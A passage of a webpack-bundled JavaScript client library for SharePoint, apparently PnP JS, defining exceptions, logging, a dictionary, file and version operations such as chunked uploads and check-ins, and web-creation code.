var AlreadyInBatchException = (function (_super) {
    __extends(AlreadyInBatchException, _super);
    function AlreadyInBatchException(msg) {
        if (msg === void 0) { msg = "This query is already part of a batch."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "AlreadyInBatchException";
        defaultLog(_this);
        return _this;
    }
    return AlreadyInBatchException;
}(Error));
exports.AlreadyInBatchException = AlreadyInBatchException;
var FunctionExpectedException = (function (_super) {
    __extends(FunctionExpectedException, _super);
    function FunctionExpectedException(msg) {
        if (msg === void 0) { msg = "This value is expected to be a function."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "FunctionExpectedException";
        defaultLog(_this);
        return _this;
    }
    return FunctionExpectedException;
}(Error));
exports.FunctionExpectedException = FunctionExpectedException;
var UrlException = (function (_super) {
    __extends(UrlException, _super);
    function UrlException(msg) {
        var _this = _super.call(this, msg) || this;
        _this.name = "UrlException";
        defaultLog(_this);
        return _this;
    }
    return UrlException;
}(Error));
exports.UrlException = UrlException;
/***/ }),
/* 4 */
/***/ (function(module, exports, __webpack_require__) {
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
var fetchclient_1 = __webpack_require__(21);
var
RuntimeConfigImpl = (function () { function RuntimeConfigImpl() { // these are our default values for the library this._headers = null; this._defaultCachingStore = "session"; this._defaultCachingTimeoutSeconds = 60; this._globalCacheDisable = false; this._fetchClientFactory = function () { return new fetchclient_1.FetchClient(); }; this._baseUrl = null; this._spfxContext = null; } RuntimeConfigImpl.prototype.set = function (config) { if (config.hasOwnProperty("headers")) { this._headers = config.headers; } if (config.hasOwnProperty("globalCacheDisable")) { this._globalCacheDisable = config.globalCacheDisable; } if (config.hasOwnProperty("defaultCachingStore")) { this._defaultCachingStore = config.defaultCachingStore; } if (config.hasOwnProperty("defaultCachingTimeoutSeconds")) { this._defaultCachingTimeoutSeconds = config.defaultCachingTimeoutSeconds; } if (config.hasOwnProperty("fetchClientFactory")) { this._fetchClientFactory = config.fetchClientFactory; } if (config.hasOwnProperty("baseUrl")) { this._baseUrl = config.baseUrl; } if (config.hasOwnProperty("spfxContext")) { this._spfxContext = config.spfxContext; } }; Object.defineProperty(RuntimeConfigImpl.prototype, "headers", { get: function () { return this._headers; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "defaultCachingStore", { get: function () { return this._defaultCachingStore; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "defaultCachingTimeoutSeconds", { get: function () { return this._defaultCachingTimeoutSeconds; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "globalCacheDisable", { get: function () { return this._globalCacheDisable; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "fetchClientFactory", { get: function () { return this._fetchClientFactory; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "baseUrl", { get: function () { if (this._baseUrl !== null) { return this._baseUrl; } else if (this._spfxContext !== null) { return this._spfxContext.pageContext.web.absoluteUrl; } return null; }, enumerable: true, configurable: true }); return RuntimeConfigImpl; }()); exports.RuntimeConfigImpl = RuntimeConfigImpl; var _runtimeConfig = new RuntimeConfigImpl(); exports.RuntimeConfig = _runtimeConfig; function setRuntimeConfig(config) { _runtimeConfig.set(config); } exports.setRuntimeConfig = setRuntimeConfig; /***/ }), /* 5 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * A set of logging levels * */ var LogLevel; (function (LogLevel) { LogLevel[LogLevel["Verbose"] = 0] = "Verbose"; LogLevel[LogLevel["Info"] = 1] = "Info"; LogLevel[LogLevel["Warning"] = 2] = "Warning"; LogLevel[LogLevel["Error"] = 3] = "Error"; LogLevel[LogLevel["Off"] = 99] = "Off"; })(LogLevel = exports.LogLevel || (exports.LogLevel = {})); /** * Class used to subscribe ILogListener and log messages throughout an application * */ var Logger = (function () { function Logger() { } Object.defineProperty(Logger, "activeLogLevel", { get: function () { return Logger.instance.activeLogLevel; }, set: function (value) { Logger.instance.activeLogLevel = value; }, enumerable: true, configurable: true }); Object.defineProperty(Logger, "instance", { get: function () { if (typeof Logger._instance === "undefined" || Logger._instance === null) 
{ Logger._instance = new LoggerImpl(); } return Logger._instance; }, enumerable: true, configurable: true }); /** * Adds ILogListener instances to the set of subscribed listeners * * @param listeners One or more listeners to subscribe to this log */ Logger.subscribe = function () { var listeners = []; for (var _i = 0; _i < arguments.length; _i++) { listeners[_i] = arguments[_i]; } listeners.map(function (listener) { return Logger.instance.subscribe(listener); }); }; /** * Clears the subscribers collection, returning the collection before modifiction */ Logger.clearSubscribers = function () { return Logger.instance.clearSubscribers(); }; Object.defineProperty(Logger, "count", { /** * Gets the current subscriber count */ get: function () { return Logger.instance.count; }, enumerable: true, configurable: true }); /** * Writes the supplied string to the subscribed listeners * * @param message The message to write * @param level [Optional] if supplied will be used as the level of the entry (Default: LogLevel.Verbose) */ Logger.write = function (message, level) { if (level === void 0) { level = LogLevel.Verbose; } Logger.instance.log({ level: level, message: message }); }; /** * Writes the supplied string to the subscribed listeners * * @param json The json object to stringify and write * @param level [Optional] if supplied will be used as the level of the entry (Default: LogLevel.Verbose) */ Logger.writeJSON = function (json, level) { if (level === void 0) { level = LogLevel.Verbose; } Logger.instance.log({ level: level, message: JSON.stringify(json) }); }; /** * Logs the supplied entry to the subscribed listeners * * @param entry The message to log */ Logger.log = function (entry) { Logger.instance.log(entry); }; /** * Logs performance tracking data for the the execution duration of the supplied function using console.profile * * @param name The name of this profile boundary * @param f The function to execute and track within this performance boundary */ Logger.measure = function (name, f) { return Logger.instance.measure(name, f); }; return Logger; }()); exports.Logger = Logger; var LoggerImpl = (function () { function LoggerImpl(activeLogLevel, subscribers) { if (activeLogLevel === void 0) { activeLogLevel = LogLevel.Warning; } if (subscribers === void 0) { subscribers = []; } this.activeLogLevel = activeLogLevel; this.subscribers = subscribers; } LoggerImpl.prototype.subscribe = function (listener) { this.subscribers.push(listener); }; LoggerImpl.prototype.clearSubscribers = function () { var s = this.subscribers.slice(0); this.subscribers.length = 0; return s; }; Object.defineProperty(LoggerImpl.prototype, "count", { get: function () { return this.subscribers.length; }, enumerable: true, configurable: true }); LoggerImpl.prototype.write = function (message, level) { if (level === void 0) { level = LogLevel.Verbose; } this.log({ level: level, message: message }); }; LoggerImpl.prototype.log = function (entry) { if (typeof entry === "undefined" || entry.level < this.activeLogLevel) { return; } this.subscribers.map(function (subscriber) { return subscriber.log(entry); }); }; LoggerImpl.prototype.measure = function (name, f) { console.profile(name); try { return f(); } finally { console.profileEnd(); } }; return LoggerImpl; }()); /** * Implementation of ILogListener which logs to the browser console * */ var ConsoleListener = (function () { function ConsoleListener() { } /** * Any associated data that a given logging listener may choose to log or ignore * * @param entry The information to be 
logged */ ConsoleListener.prototype.log = function (entry) { var msg = this.format(entry); switch (entry.level) { case LogLevel.Verbose: case LogLevel.Info: console.log(msg); break; case LogLevel.Warning: console.warn(msg); break; case LogLevel.Error: console.error(msg); break; } }; /** * Formats the message * * @param entry The information to format into a string */ ConsoleListener.prototype.format = function (entry) { return "Message: " + entry.message + " Data: " + JSON.stringify(entry.data); }; return ConsoleListener; }()); exports.ConsoleListener = ConsoleListener; /** * Implementation of ILogListener which logs to the supplied function * */ var FunctionListener = (function () { /** * Creates a new instance of the FunctionListener class * * @constructor * @param method The method to which any logging data will be passed */ function FunctionListener(method) { this.method = method; } /** * Any associated data that a given logging listener may choose to log or ignore * * @param entry The information to be logged */ FunctionListener.prototype.log = function (entry) { this.method(entry); }; return FunctionListener; }()); exports.FunctionListener = FunctionListener; /***/ }), /* 6 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * Generic dictionary */ var Dictionary = (function () { /** * Creates a new instance of the Dictionary<T> class * * @constructor */ function Dictionary(keys, values) { if (keys === void 0) { keys = []; } if (values === void 0) { values = []; } this.keys = keys; this.values = values; } /** * Gets a value from the collection using the specified key * * @param key The key whose value we want to return, returns null if the key does not exist */ Dictionary.prototype.get = function (key) { var index = this.keys.indexOf(key); if (index < 0) { return null; } return this.values[index]; }; /** * Adds the supplied key and value to the dictionary * * @param key The key to add * @param o The value to add */ Dictionary.prototype.add = function (key, o) { var index = this.keys.indexOf(key); if (index > -1) { this.values[index] = o; } else { this.keys.push(key); this.values.push(o); } }; /** * Merges the supplied typed hash into this dictionary instance. Existing values are updated and new ones are created as appropriate. */ Dictionary.prototype.merge = function (source) { var _this = this; if ("getKeys" in source) { var sourceAsDictionary_1 = source; sourceAsDictionary_1.getKeys().map(function (key) { _this.add(key, sourceAsDictionary_1.get(key)); }); } else { var sourceAsHash = source; for (var key in sourceAsHash) { if (sourceAsHash.hasOwnProperty(key)) { this.add(key, sourceAsHash[key]); } } } }; /** * Removes a value from the dictionary * * @param key The key of the key/value pair to remove. Returns null if the key was not found. 
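*
* A minimal usage sketch (illustrative only; the keys and values are arbitrary):
* @example
* var d = new Dictionary();
* d.add("color", "red");
* d.add("color", "blue");          // existing key: the value is replaced in place
* var removed = d.remove("color"); // "blue"; d.count() is now 0
* var missing = d.remove("size");  // null, since the key was never present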
*/ Dictionary.prototype.remove = function (key) { var index = this.keys.indexOf(key); if (index < 0) { return null; } var val = this.values[index]; this.keys.splice(index, 1); this.values.splice(index, 1); return val; }; /** * Returns all the keys currently in the dictionary as an array */ Dictionary.prototype.getKeys = function () { return this.keys; }; /** * Returns all the values currently in the dictionary as an array */ Dictionary.prototype.getValues = function () { return this.values; }; /** * Clears the current dictionary */ Dictionary.prototype.clear = function () { this.keys = []; this.values = []; }; /** * Gets a count of the items currently in the dictionary */ Dictionary.prototype.count = function () { return this.keys.length; }; return Dictionary; }()); exports.Dictionary = Dictionary; /***/ }), /* 7 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var odata_1 = __webpack_require__(2); var util_1 = __webpack_require__(0); var exceptions_1 = __webpack_require__(3); var webparts_1 = __webpack_require__(50); var items_1 = __webpack_require__(10); var queryableshareable_1 = __webpack_require__(12); var odata_2 = __webpack_require__(2); /** * Describes a collection of File objects * */ var Files = (function (_super) { __extends(Files, _super); /** * Creates a new instance of the Files class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Files(baseUrl, path) { if (path === void 0) { path = "files"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a File by filename * * @param name The name of the file, including extension. */ Files.prototype.getByName = function (name) { var f = new File(this); f.concat("('" + name + "')"); return f; }; /** * Uploads a file. Not supported for batching * * @param url The folder-relative url of the file. * @param content The file contents blob. * @param shouldOverWrite Should a file with the same name in the same location be overwritten? (default: true) * @returns The new File and the raw response. */ Files.prototype.add = function (url, content, shouldOverWrite) { var _this = this; if (shouldOverWrite === void 0) { shouldOverWrite = true; } return new Files(this, "add(overwrite=" + shouldOverWrite + ",url='" + url + "')") .post({ body: content, }).then(function (response) { return { data: response, file: _this.getByName(url), }; }); }; /** * Uploads a file. Not supported for batching * * @param url The folder-relative url of the file. * @param content The Blob file content to add * @param progress A callback function which can be used to track the progress of the upload * @param shouldOverWrite Should a file with the same name in the same location be overwritten? (default: true) * @param chunkSize The size of each file slice, in bytes (default: 10485760) * @returns The new File and the raw response. 
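*
* An illustrative sketch of a chunked upload with progress reporting; the folder path,
* the "fileInput" element and the Web instance named "web" are assumptions:
* @example
* var blob = fileInput.files[0];
* web.getFolderByServerRelativeUrl("/sites/dev/Shared Documents")
*     .files.addChunked(blob.name, blob, function (data) {
*         console.log(data.stage + ": block " + data.blockNumber + " of " + data.totalBlocks);
*     })
*     .then(function (result) { console.log("uploaded", result.data); });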
*/ Files.prototype.addChunked = function (url, content, progress, shouldOverWrite, chunkSize) { var _this = this; if (shouldOverWrite === void 0) { shouldOverWrite = true; } if (chunkSize === void 0) { chunkSize = 10485760; } var adder = this.clone(Files, "add(overwrite=" + shouldOverWrite + ",url='" + url + "')"); return adder.post().then(function () { return _this.getByName(url); }).then(function (file) { return file.setContentChunked(content, progress, chunkSize); }).then(function (response) { return { data: response, file: _this.getByName(url), }; }); }; /** * Adds a ghosted file to an existing list or document library. Not supported for batching. * * @param fileUrl The server-relative url where you want to save the file. * @param templateFileType The type of use to create the file. * @returns The template file that was added and the raw response. */ Files.prototype.addTemplateFile = function (fileUrl, templateFileType) { var _this = this; return this.clone(Files, "addTemplateFile(urloffile='" + fileUrl + "',templatefiletype=" + templateFileType + ")") .post().then(function (response) { return { data: response, file: _this.getByName(fileUrl), }; }); }; return Files; }(queryable_1.QueryableCollection)); exports.Files = Files; /** * Describes a single File instance * */ var File = (function (_super) { __extends(File, _super); function File() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(File.prototype, "listItemAllFields", { /** * Gets a value that specifies the list item field values for the list item corresponding to the file. * */ get: function () { return new queryable_1.QueryableCollection(this, "listItemAllFields"); }, enumerable: true, configurable: true }); Object.defineProperty(File.prototype, "versions", { /** * Gets a collection of versions * */ get: function () { return new Versions(this); }, enumerable: true, configurable: true }); /** * Approves the file submitted for content approval with the specified comment. * Only documents in lists that are enabled for content approval can be approved. * * @param comment The comment for the approval. */ File.prototype.approve = function (comment) { if (comment === void 0) { comment = ""; } return this.clone(File, "approve(comment='" + comment + "')", true).post(); }; /** * Stops the chunk upload session without saving the uploaded data. Does not support batching. * If the file doesn’t already exist in the library, the partially uploaded file will be deleted. * Use this in response to user action (as in a request to cancel an upload) or an error or exception. * Use the uploadId value that was passed to the StartUpload method that started the upload session. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. */ File.prototype.cancelUpload = function (uploadId) { return this.clone(File, "cancelUpload(uploadId=guid'" + uploadId + "')", false).post(); }; /** * Checks the file in to a document library based on the check-in type. * * @param comment A comment for the check-in. Its length must be <= 1023. * @param checkinType The check-in type for the file. 
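*
* A sketch of a checkout/checkin round trip; the file path and the Web instance
* named "web" are assumptions, and CheckinType is the enum defined later in this module:
* @example
* var file = web.getFileByServerRelativeUrl("/sites/dev/Shared Documents/report.docx");
* file.checkout()
*     .then(function () { return file.checkin("Quarterly figures updated", CheckinType.Major); });
* // a comment over 1023 characters throws MaxCommentLengthException before any request is sent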
*/ File.prototype.checkin = function (comment, checkinType) { if (comment === void 0) { comment = ""; } if (checkinType === void 0) { checkinType = CheckinType.Major; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "checkin(comment='" + comment + "',checkintype=" + checkinType + ")", true).post(); }; /** * Checks out the file from a document library. */ File.prototype.checkout = function () { return this.clone(File, "checkout", true).post(); }; /** * Copies the file to the destination url. * * @param url The absolute url or server relative url of the destination file path to copy to. * @param shouldOverWrite Should a file with the same name in the same location be overwritten? */ File.prototype.copyTo = function (url, shouldOverWrite) { if (shouldOverWrite === void 0) { shouldOverWrite = true; } return this.clone(File, "copyTo(strnewurl='" + url + "',boverwrite=" + shouldOverWrite + ")", true).post(); }; /** * Delete this file. * * @param eTag Value used in the IF-Match header, by default "*" */ File.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.clone(File, null, true).post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Denies approval for a file that was submitted for content approval. * Only documents in lists that are enabled for content approval can be denied. * * @param comment The comment for the denial. */ File.prototype.deny = function (comment) { if (comment === void 0) { comment = ""; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "deny(comment='" + comment + "')", true).post(); }; /** * Specifies the control set used to access, modify, or add Web Parts associated with this Web Part Page and view. * An exception is thrown if the file is not an ASPX page. * * @param scope The WebPartsPersonalizationScope view on the Web Parts page. */ File.prototype.getLimitedWebPartManager = function (scope) { if (scope === void 0) { scope = WebPartsPersonalizationScope.Shared; } return new webparts_1.LimitedWebPartManager(this, "getLimitedWebPartManager(scope=" + scope + ")"); }; /** * Moves the file to the specified destination url. * * @param url The absolute url or server relative url of the destination file path to move to. * @param moveOperations The bitwise MoveOperations value for how to move the file. */ File.prototype.moveTo = function (url, moveOperations) { if (moveOperations === void 0) { moveOperations = MoveOperations.Overwrite; } return this.clone(File, "moveTo(newurl='" + url + "',flags=" + moveOperations + ")", true).post(); }; /** * Submits the file for content approval with the specified comment. * * @param comment The comment for the published file. Its length must be <= 1023. */ File.prototype.publish = function (comment) { if (comment === void 0) { comment = ""; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "publish(comment='" + comment + "')", true).post(); }; /** * Moves the file to the Recycle Bin and returns the identifier of the new Recycle Bin item. * * @returns The GUID of the recycled file. */ File.prototype.recycle = function () { return this.clone(File, "recycle", true).post(); }; /** * Reverts an existing checkout for the file. * */ File.prototype.undoCheckout = function () { return this.clone(File, "undoCheckout", true).post(); }; /** * Removes the file from content approval or unpublish a major version. 
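*
* For illustration, publish and unpublish pair naturally (assumes "file" is a
* checked-in File in a library with content approval enabled):
* @example
* file.publish("Ready for review")
*     .then(function () { return file.unpublish("Withdrawn for further edits"); });
*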
* * @param comment The comment for the unpublish operation. Its length must be <= 1023. */ File.prototype.unpublish = function (comment) { if (comment === void 0) { comment = ""; } if (comment.length > 1023) { throw new exceptions_1.MaxCommentLengthException(); } return this.clone(File, "unpublish(comment='" + comment + "')", true).post(); }; /** * Gets the contents of the file as text. Not supported in batching. * */ File.prototype.getText = function () { return this.clone(File, "$value").get(new odata_1.TextFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Gets the contents of the file as a blob, does not work in Node.js. Not supported in batching. * */ File.prototype.getBlob = function () { return this.clone(File, "$value").get(new odata_1.BlobFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js. Not supported in batching. */ File.prototype.getBuffer = function () { return this.clone(File, "$value").get(new odata_1.BufferFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js. Not supported in batching. */ File.prototype.getJSON = function () { return this.clone(File, "$value").get(new odata_1.JSONFileParser(), { headers: { "binaryStringResponseBody": "true" } }); }; /** * Sets the content of a file, for large files use setContentChunked. Not supported in batching. * * @param content The file content * */ File.prototype.setContent = function (content) { var _this = this; return this.clone(File, "$value").post({ body: content, headers: { "X-HTTP-Method": "PUT", }, }).then(function (_) { return new File(_this); }); }; /** * Gets the associated list item for this folder, loading the default properties */ File.prototype.getItem = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } var q = this.listItemAllFields; return q.select.apply(q, selects).get().then(function (d) { return util_1.Util.extend(new items_1.Item(odata_2.getEntityUrl(d)), d); }); }; /** * Sets the contents of a file using a chunked upload approach. Not supported in batching. * * @param file The file to upload * @param progress A callback function which can be used to track the progress of the upload * @param chunkSize The size of each file slice, in bytes (default: 10485760) */ File.prototype.setContentChunked = function (file, progress, chunkSize) { if (chunkSize === void 0) { chunkSize = 10485760; } if (typeof progress === "undefined") { progress = function () { return null; }; } var self = this; var fileSize = file.size; var blockCount = parseInt((file.size / chunkSize).toString(), 10) + ((file.size % chunkSize === 0) ? 
1 : 0); var uploadId = util_1.Util.getGUID(); // start the chain with the first fragment progress({ blockNumber: 1, chunkSize: chunkSize, currentPointer: 0, fileSize: fileSize, stage: "starting", totalBlocks: blockCount }); var chain = self.startUpload(uploadId, file.slice(0, chunkSize)); var _loop_1 = function (i) { chain = chain.then(function (pointer) { progress({ blockNumber: i, chunkSize: chunkSize, currentPointer: pointer, fileSize: fileSize, stage: "continue", totalBlocks: blockCount }); return self.continueUpload(uploadId, pointer, file.slice(pointer, pointer + chunkSize)); }); }; // skip the first and last blocks for (var i = 2; i < blockCount; i++) { _loop_1(i); } return chain.then(function (pointer) { progress({ blockNumber: blockCount, chunkSize: chunkSize, currentPointer: pointer, fileSize: fileSize, stage: "finishing", totalBlocks: blockCount }); return self.finishUpload(uploadId, pointer, file.slice(pointer)); }).then(function (_) { return self; }); }; /** * Starts a new chunk upload session and uploads the first fragment. * The current file content is not changed when this method completes. * The method is idempotent (and therefore does not change the result) as long as you use the same values for uploadId and stream. * The upload session ends either when you use the CancelUpload method or when you successfully * complete the upload session by passing the rest of the file contents through the ContinueUpload and FinishUpload methods. * The StartUpload and ContinueUpload methods return the size of the running total of uploaded data in bytes, * so you can pass those return values to subsequent uses of ContinueUpload and FinishUpload. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. * @param fragment The file contents. * @returns The size of the total uploaded data in bytes. */ File.prototype.startUpload = function (uploadId, fragment) { return this.clone(File, "startUpload(uploadId=guid'" + uploadId + "')").postAs({ body: fragment }).then(function (n) { return parseFloat(n); }); }; /** * Continues the chunk upload session with an additional fragment. * The current file content is not changed. * Use the uploadId value that was passed to the StartUpload method that started the upload session. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. * @param fileOffset The size of the offset into the file where the fragment starts. * @param fragment The file contents. * @returns The size of the total uploaded data in bytes. */ File.prototype.continueUpload = function (uploadId, fileOffset, fragment) { return this.clone(File, "continueUpload(uploadId=guid'" + uploadId + "',fileOffset=" + fileOffset + ")").postAs({ body: fragment }).then(function (n) { return parseFloat(n); }); }; /** * Uploads the last file fragment and commits the file. The current file content is changed when this method completes. * Use the uploadId value that was passed to the StartUpload method that started the upload session. * This method is currently available only on Office 365. * * @param uploadId The unique identifier of the upload session. * @param fileOffset The size of the offset into the file where the fragment starts. * @param fragment The file contents. * @returns The newly uploaded file. 
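*
* A sketch of driving an upload session by hand; setContentChunked above wraps this
* same start/continue/finish chain, and "blob", "size" and the Util import are assumptions:
* @example
* var uploadId = Util.getGUID();
* file.startUpload(uploadId, blob.slice(0, size))
*     .then(function (pos) { return file.continueUpload(uploadId, pos, blob.slice(pos, pos + size)); })
*     .then(function (pos) { return file.finishUpload(uploadId, pos, blob.slice(pos)); })
*     .then(function (result) { console.log(result.data.ServerRelativeUrl); });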
*/ File.prototype.finishUpload = function (uploadId, fileOffset, fragment) { return this.clone(File, "finishUpload(uploadId=guid'" + uploadId + "',fileOffset=" + fileOffset + ")") .postAs({ body: fragment }).then(function (response) { return { data: response, file: new File(response.ServerRelativeUrl), }; }); }; return File; }(queryableshareable_1.QueryableShareableFile)); exports.File = File; /** * Describes a collection of Version objects * */ var Versions = (function (_super) { __extends(Versions, _super); /** * Creates a new instance of the File class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Versions(baseUrl, path) { if (path === void 0) { path = "versions"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a version by id * * @param versionId The id of the version to retrieve */ Versions.prototype.getById = function (versionId) { var v = new Version(this); v.concat("(" + versionId + ")"); return v; }; /** * Deletes all the file version objects in the collection. * */ Versions.prototype.deleteAll = function () { return new Versions(this, "deleteAll").post(); }; /** * Deletes the specified version of the file. * * @param versionId The ID of the file version to delete. */ Versions.prototype.deleteById = function (versionId) { return this.clone(Versions, "deleteById(vid=" + versionId + ")", true).post(); }; /** * Deletes the file version object with the specified version label. * * @param label The version label of the file version to delete, for example: 1.2 */ Versions.prototype.deleteByLabel = function (label) { return this.clone(Versions, "deleteByLabel(versionlabel='" + label + "')", true).post(); }; /** * Creates a new file version from the file specified by the version label. * * @param label The version label of the file version to restore, for example: 1.2 */ Versions.prototype.restoreByLabel = function (label) { return this.clone(Versions, "restoreByLabel(versionlabel='" + label + "')", true).post(); }; return Versions; }(queryable_1.QueryableCollection)); exports.Versions = Versions; /** * Describes a single Version instance * */ var Version = (function (_super) { __extends(Version, _super); function Version() { return _super !== null && _super.apply(this, arguments) || this; } /** * Delete a specific version of a file. 
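*
* A short sketch (the version id and label are placeholders; "file" is an assumed File):
* @example
* file.versions.getById(512).delete()
*     .then(function () { return file.versions.deleteByLabel("2.0"); });
*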
* * @param eTag Value used in the IF-Match header, by default "*" */ Version.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; return Version; }(queryable_1.QueryableInstance)); exports.Version = Version; var CheckinType; (function (CheckinType) { CheckinType[CheckinType["Minor"] = 0] = "Minor"; CheckinType[CheckinType["Major"] = 1] = "Major"; CheckinType[CheckinType["Overwrite"] = 2] = "Overwrite"; })(CheckinType = exports.CheckinType || (exports.CheckinType = {})); var WebPartsPersonalizationScope; (function (WebPartsPersonalizationScope) { WebPartsPersonalizationScope[WebPartsPersonalizationScope["User"] = 0] = "User"; WebPartsPersonalizationScope[WebPartsPersonalizationScope["Shared"] = 1] = "Shared"; })(WebPartsPersonalizationScope = exports.WebPartsPersonalizationScope || (exports.WebPartsPersonalizationScope = {})); var MoveOperations; (function (MoveOperations) { MoveOperations[MoveOperations["Overwrite"] = 1] = "Overwrite"; MoveOperations[MoveOperations["AllowBrokenThickets"] = 8] = "AllowBrokenThickets"; })(MoveOperations = exports.MoveOperations || (exports.MoveOperations = {})); var TemplateFileType; (function (TemplateFileType) { TemplateFileType[TemplateFileType["StandardPage"] = 0] = "StandardPage"; TemplateFileType[TemplateFileType["WikiPage"] = 1] = "WikiPage"; TemplateFileType[TemplateFileType["FormPage"] = 2] = "FormPage"; })(TemplateFileType = exports.TemplateFileType || (exports.TemplateFileType = {})); /***/ }), /* 8 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) { var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d; if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc); else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? 
d(target, key, r) : d(target, key)) || r; return c > 3 && r && Object.defineProperty(target, key, r), r; }; Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var lists_1 = __webpack_require__(11); var fields_1 = __webpack_require__(24); var navigation_1 = __webpack_require__(25); var sitegroups_1 = __webpack_require__(18); var contenttypes_1 = __webpack_require__(16); var folders_1 = __webpack_require__(9); var roles_1 = __webpack_require__(17); var files_1 = __webpack_require__(7); var util_1 = __webpack_require__(0); var lists_2 = __webpack_require__(11); var siteusers_1 = __webpack_require__(30); var usercustomactions_1 = __webpack_require__(19); var odata_1 = __webpack_require__(2); var features_1 = __webpack_require__(23); var decorators_1 = __webpack_require__(51); var queryableshareable_1 = __webpack_require__(12); var relateditems_1 = __webpack_require__(46); var Webs = (function (_super) { __extends(Webs, _super); function Webs(baseUrl, webPath) { if (webPath === void 0) { webPath = "webs"; } return _super.call(this, baseUrl, webPath) || this; } /** * Adds a new web to the collection * * @param title The new web's title * @param url The new web's relative url * @param description The web web's description * @param template The web's template * @param language The language code to use for this web * @param inheritPermissions If true permissions will be inherited from the partent web * @param additionalSettings Will be passed as part of the web creation body */ Webs.prototype.add = function (title, url, description, template, language, inheritPermissions, additionalSettings) { if (description === void 0) { description = ""; } if (template === void 0) { template = "STS"; } if (language === void 0) { language = 1033; } if (inheritPermissions === void 0) { inheritPermissions = true; } if (additionalSettings === void 0) { additionalSettings = {}; } var props = util_1.Util.extend({ Description: description, Language: language, Title: title, Url: url, UseSamePermissionsAsParentSite: inheritPermissions, WebTemplate: template, }, additionalSettings); var postBody = JSON.stringify({ "parameters": util_1.Util.extend({ "__metadata": { "type": "SP.WebCreationInformation" }, }, props), }); return this.clone(Webs, "add", true).post({ body: postBody }).then(function (data) { return { data: data, web: new Web(odata_1.extractOdataId(data).replace(/_api\/web\/?/i, "")), }; }); }; return Webs; }(queryable_1.QueryableCollection)); exports.Webs = Webs; var WebInfos = (function (_super) { __extends(WebInfos, _super); function WebInfos(baseUrl, webPath) { if (webPath === void 0) { webPath = "webinfos"; } return _super.call(this, baseUrl, webPath) || this; } return WebInfos; }(queryable_1.QueryableCollection)); exports.WebInfos = WebInfos; /** * Describes a web * */ var Web = (function (_super) { __extends(Web, _super); function Web(baseUrl, path) { if (path === void 0) { path = "_api/web"; } return _super.call(this, baseUrl, path) || this; } /** * Creates a new web instance from the given url by indexing the location of the /_api/ * segment. If this is not found the method creates a new web with the entire string as * supplied. 
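*
* A sketch of the two parse paths (the tenant url is a placeholder):
* @example
* Web.fromUrl("https://tenant.sharepoint.com/sites/dev/_api/web/lists");
* // -> web rooted at "https://tenant.sharepoint.com/sites/dev/"; everything from _api/ is dropped
* Web.fromUrl("https://tenant.sharepoint.com/sites/dev");
* // -> no _api/ segment, so the whole string is used as supplied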
